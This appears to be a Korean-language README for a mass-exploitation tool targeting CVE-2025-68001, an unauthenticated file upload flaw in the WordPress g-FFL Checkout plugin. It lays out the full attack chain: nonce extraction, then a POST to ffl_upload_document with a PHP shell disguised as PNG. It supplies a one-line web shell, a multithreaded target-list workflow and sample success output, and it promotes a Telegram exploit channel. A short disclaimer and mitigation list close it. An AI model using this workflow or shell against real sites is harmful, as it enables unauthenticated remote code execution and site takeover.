
WordPress g-FFL Checkout Plugin <= 2.1.0은 높은 우선순위의 임의 파일 업로드에 취약합니다.
WordPress g-FFL 체크아웃 플러그인 <= 2.1.0에서 발생하는 높은 우선순위의 임의 파일 업로드 취약점
_ _ _ _ _ _ _ _ _ _
/ \ / |_ __ ) / \ ) |_ __ |_ (_) / \ / \ /|
\_ \/ |_ /_ \_/ /_ _) |_) (_) \_/ \_/ |
📡 항상 앞서 나가세요. Telegram에서 @KNxploited 에 가입하세요 — 최신 CVE, 제로데이 및 최첨단 익스플로잇 연구를 위한 독점 소스입니다. 지속적으로 업데이트됩니다. 모두를 위한 것은 아닙니다.
은 의 WordPress 플러그인에서 발견된 치명적인 취약점입니다.
이 취약점을 통해 인증되지 않은 원격 공격자는 ffl_upload_document AJAX 액션을 통해 웹 셸을 포함한 임의의 파일을 대상 서버에 업로드하여 전체 원격 코드 실행(RCE) 에 도달할 수 있습니다.
| 필드 | 세부 정보 |
|---|---|
| CVE ID | CVE-2025-68001 |
| 플러그인 | g-FFL 체크아웃 (g-ffl-checkout) |
| 영향 받는 버전 | n/a 부터 <= 2.1.0까지 |
| 취약점 유형 | 제한 없는 파일 업로드 |
| 영향 | 원격 코드 실행(RCE) |
| 인증 | 필요 없음 |
| CVSS 심각도 | 치명적 |
| 연구자 | Nxploited |
이 익스플로잇은 정확한 다단계 공격 체인을 따릅니다:
1. GET /checkout
↓
인라인 JavaScript 데이터에서 `checkout_nonce` 추출
2. POST /wp-admin/admin-ajax.php
action=ffl_upload_document
nonce=<추출된_nonce>
document_type=document
document=<image/png로 위장한 shell.php>
↓
서버가 확장자 또는 MIME 검증 없이 파일 저장
3. JSON 응답 파싱
↓
업로드된 파일 경로 / 고유 파일명 추출
4. HTTP를 통해 업로드된 셸에 접근
↓
원격 코드 실행 성공 ✔️
이 플러그인은 AJAX 엔드포인트 ffl_upload_document를 노출하며, 이는 다음을 수행합니다:
실행 전 모든 종속성을 설치하세요:
pip install requests rich
| 종속성 | 목적 |
|---|---|
requests | HTTP 요청 및 세션 처리 |
rich | 터미널 UI, 진행 표시줄, 패널 |
threading | 멀티스레드 대상 처리 |
Python 3.8+ 이 필요합니다.
CVE-2025-68001/
├── CVE-2025-68001.py # 메인 익스플로잇 스크립트
├── shell.php # 업로드할 웹 셸 (직접 제공)
├── list.txt # 대상 URL (한 줄에 하나씩)
└── success_results.txt # 자동 생성된 결과 출력
한 줄에 하나의 대상 URL로 list.txt 파일을 만드세요:
https://target1.com
https://target2.com
http://target3.com/wordpress
스크립트는 스키마가 제공되지 않은 경우 자동으로
http://를 앞에 추가합니다.
PHP 웹 셸을 동일한 디렉토리에 배치하세요. 최소 셸 예시:
<?php system($_GET['cmd']); ?>
shell.php로 저장하세요 (또는 다른 이름 — 입력하라는 메시지가 표시됩니다).
python CVE-2025-68001.py
대화형으로 메시지가 표시됩니다:
대상 파일 이름 입력 (기본값: list.txt):
> list.txt
업로드할 셸 파일 이름 입력 (기본값: shell.php):
> shell.php
스레드 수 입력 (기본값: 50):
> 20
성공적인 익스플로잇은 success_results.txt에 자동으로 저장됩니다:
https://target.com | /wp-content/uploads/ffl/abc123.php | abc123.php | shell.php
각 줄에는 다음이 포함됩니다:
| 프롬프트 | 기본값 | 설명 |
|---|---|---|
| 대상 파일 | list.txt | 대상 URL이 포함된 파일 |
| 셸 파일 | shell.php | 대상에 업로드할 PHP 셸 |
| 스레드 수 | 50 | 동시 작업자 (최대: 50) |
✔ https://victim.com — /checkout 도달 가능. 익스플로잇 시도 중...
┌─────────────────────────────────────────────────────┐
│ 성공 │
│ https://victim.com │
│ 원래 이름: shell.php │
│ 고유 이름: a7f3c1d9e.php │
│ 저장 경로: /wp-content/uploads/ffl/a7f3c1.php │
└─────────────────────────────────────────────────────┘
모든 대상 처리 완료 ✔️. 결과 저장 위치: success_results.txt
취약점은 권한 확인 없이 등록된 플러그인의 AJAX 핸들러에 있습니다:
// 인증 또는 권한 확인 없음
add_action('wp_ajax_nopriv_ffl_upload_document', 'ffl_upload_document');
function ffl_upload_document() {
// /checkout 페이지에서 논스 확인 (공개적으로 접근 가능)
// MIME 유형 검증 없음
// 확장자 화이트리스트/블랙리스트 없음
move_uploaded_file($_FILES['document']['tmp_name'], $upload_path);
wp_send_json_success(['file_path' => $upload_path]);
}
사이트 소유자 또는 개발자인 경우 다음 단계를 즉시 수행하세요:
g-ffl-checkout 플러그인을 패치된 버전(> 2.1.0)으로 (가능한 경우).htaccess 규칙).php 파일 모니터링이 도구는 교육 및 허가된 보안 연구 목적으로만 엄격히 제공됩니다.
이 스크립트를 사용함으로써 귀하는 다음에 명시적으로 동의합니다:
• 대상 시스템 소유자로부터 명시적인 서면 허가를 받았습니다.
• 통제된 연구실 또는 허가된 침투 테스트 환경에서 운영 중입니다.
• 귀하가 소유하지 않았거나 법적 테스트 권한이 없는 시스템에 대해
이 도구를 사용하지 않을 것입니다.
• 저자(Nxploited)는 이 도구로 인한 손해, 데이터 손실, 법적 결과
또는 오용에 대해 어떠한 책임도 지지 않습니다.
허가 없이 이 도구를 시스템에 무단 사용하는 것은 불법이며
다음을 포함하되 이에 국한되지 않는 법률을 위반할 수 있습니다:
— 컴퓨터 사기 및 남용법(CFAA)
— 정보 시스템에 대한 공격에 관한 EU 지침
— 및 해당 관할권의 동등한 법률.
책임감 있게 사용하세요. 윤리적으로 해킹하세요.
| 핸들 | Nxploited |
| Telegram | @KNxploited |
| GitHub | github.com/Nxploited |
🔔 Telegram에서 @KNxploited를 팔로우하세요 최신 취약점 공개, 익스플로잇 릴리스 및 보안 연구를 다른 누구보다 먼저 받아보세요.